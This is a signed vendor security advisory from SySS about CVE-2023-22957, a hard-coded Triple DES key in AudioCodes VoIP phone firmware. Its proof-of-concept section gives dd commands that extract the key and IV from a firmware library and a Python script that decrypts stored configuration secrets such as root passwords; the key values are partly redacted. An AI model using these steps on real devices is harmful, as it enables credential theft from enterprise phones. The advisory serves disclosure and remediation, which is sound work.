-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2022-052
Product:                   AudioCodes VoIP Phones
Manufacturer:              AudioCodes Ltd.
Affected Version(s):       Firmware Versions < 3.4.8.808
Tested Version(s):         Firmware Version 3.4.4.1000
Vulnerability Type:        Use of Hard-coded Cryptographic Key (CWE-321)
Risk Level:                Medium
Solution Status:           Fixed
Manufacturer Notification: 2022-11-11
Solution Date:             2023-08-15
Public Disclosure:         2023-08-10
CVE Reference:             CVE-2023-22957
Author of Advisory:        Moritz Abrell, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

AudioCodes VoIP phones are modern desk phones which are used for the 
operation in enterprise environments.

The manufacturer describes the product as follows (see [1]):

"The AudioCodes 400HD series of IP phones is a range of easy-to-use, 
feature-rich desktop devices for the service provider hosted services, 
enterprise IP telephony and contact center markets. Based on the same 
advanced, field-proven underlying technology as our other VoIP products, 
AudioCodes high quality IP phones enable systems integrators and end 
customers to build end-to-end VoIP solutions."


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The AudioCodes VoIP phones store sensitive information, e.g. credentials
and passwords, in encrypted form in their configuration files.
These encrypted values can also be automatically configured, e.g. via 
the "One Voice Operation Center" or other central device management solutions.

Due to the use of a hardcoded cryptographic key, an attacker with 
access to these configuration files is able to decrypt the encrypted 
values and retrieve sensitive information, e.g. the device root password.


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

By analyzing the shared library "libac_des3.so" of an AudioCodes IP phone 
firmware in a disassembler and decompiler, e.g. Ghidra, the encryption 
mechanism could be reversed and the hardcoded cryptographic key could be 
extracted.

Used encryption algorithm: Triple DES in CBC mode
Memory address of the 24-byte 3DES key in the library: 00000fb8
Memory address of the 8-byte 3DES IV: 00000fb0

Extracting the key:
    #> offset=$(python3 -c 'print(int("00000fb8", base=16))')
    #> dd skip=$offset count=24 if=libac_des3.so of=key.bin bs=1

Extracting the IV:
    #> offset=$(python3 -c 'print(int("00000fb0", base=16))')
    #> dd skip=$offset count=8 if=libac_des3.so of=iv.bin bs=1


The following proof-of-concept Python script can be used for decryption:

  import sys
  import base64
  from Crypto.Cipher import DES3
  from binascii import unhexlify
  
  coded_string = sys.argv[1]
  
  ciphertext = base64.b64decode(coded_string)
  
  print("cipher text: " + str(hexlify(ciphertext)))
        
  cipher = DES3.new(
      unhexlify('604075fb509b8269[...]'), 
      DES3.MODE_CBC, 
      iv=unhexlify('a3a47c5b[...]')
  )
  
  plaintext = cipher.decrypt(ciphertext)
  
  print("plain text: " + str(plaintext.decode('utf-8')))


Execution of the proof-of-concept script:
    #> python decrypt.py kUqyNmIT1cDyBwGTu6J1Dw== 
    
    cipher text: b'914ab2366213d5c0f2070193bba2750f'
    plain text: S3cr3tP455w0rd  

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Update devices to firmware version 3.4.8.M4 and define an individual and 
strong secret from which the encryption key is derived.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2022-11-03: Vulnerability discovered
2022-11-11: Vulnerability reported to manufacturer
2022-12-12: Vulnerability confirmed by AudioCodes Ltd.
2023-01-19: AudioCodes Ltd. adapts the documentation so that it no 
            longer states that the passwords are encrypted but obfuscated
2023-07-13: AudioCodes Ltd. informs that the upcoming release 3.4.8.M4
            will include a feature that allows setting a custom password 
            from which the key will be derived
2023-08-10: Public disclosure at BlackHat USA[5]
2023-08-11: Public disclosure at https://blog.syss.com[6]
2023-09-11: Discussion with AudioCodes on the vulnerability state.
2023-09-12: AudioCodes Ltd. informs that the vulnerability is fixed in
            firmware version 3.4.8.808 released on August 15th.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] AudioCodes IP Phones Product Website
    https://www.audiocodes.com/solutions-products/products/ip-phones
[2] AudioCodes One Voice Operation Center User's Manual
    https://www.audiocodes.com/media/15928/one-voice-operations-center-users-manual-ver-80.pdf
[3] SySS Security Advisory SYSS-2022-052
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-052.txt
[4] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy
[5] BlackHat USA Briefings Session
    https://www.blackhat.com/us-23/briefings/schedule/#zero-touch-pwn-abusing-zooms-zero-touch-provisioning-for-remote-attacks-on-desk-phones-31341
[6] Detailed Blog Post
    https://blog.syss.com/posts/zero-touch-pwn/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Abrell of SySS GmbH.

E-Mail: moritz.abrell@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc
Key Fingerprint: 2927 7EB6 1A20 0679 79E9  87E6 AE0C 9BF8 F134 8B53

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" 
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmUAsZ8ACgkQrgyb+PE0
i1NT7w//RYf9sXLTaDUF0zDFlacjNMr9XbwXTMvEK4Mx6D3GqRBrwRIOjfN72QyU
1WcHers3Uh/x6v/84Qtiz8HqqBsnhDr+yg/IBhDVgjMMLWxBPGA3qqFFebmfSsym
doNqhjVW9qO4jbRJTCGAHpzolKVStgULSwJW6KKq6J8lpJ0IOvBOkBi3kAoBx2CX
ioCMPAFqlTSOZtCObDWWd6gJ0WZdjmcJZ3dcRL7UAzSbB1lYvUP3QC0rI0eeCGAu
xjFwDBn9G143qOA/Wgkxz7921NWqQm+boBmidbig9fKxZykpNBfjA6lh9BX0hGjh
58JkNG3m0BFLUnuazhjUembLISEFTU6FRByM21F0Qi9lHZhCohTlONm1Zu2Sc5BB
WRrN7YUndbLyJEO4W+/NLOWhtvth3OBzIi+uW53r4JfkSJo0fKOfXcjhHwXUhoec
ueqUBQQjh4FURNhWFRc/4GQU/R6XZ3r2vrK5zl9xxwfdCPKWO8wNRNpSqdAyTbsj
exCte5GNoy1cBVyaJhM+MI+eV4bV9+rS/+vluAc25ZQ28lQPo16r0Vjj9rl/UC4Y
gbHeE13a44NapJszjhvRBNmo3DmAqm2xCdzR1kTZLi6RA/5e8Y+Z5aWHUAjszfi9
ZGasJKJrO3yIMalc8guhubx3KG594OMOJJzowwdAXuiU+KjNGO4=
=e9Qm
-----END PGP SIGNATURE-----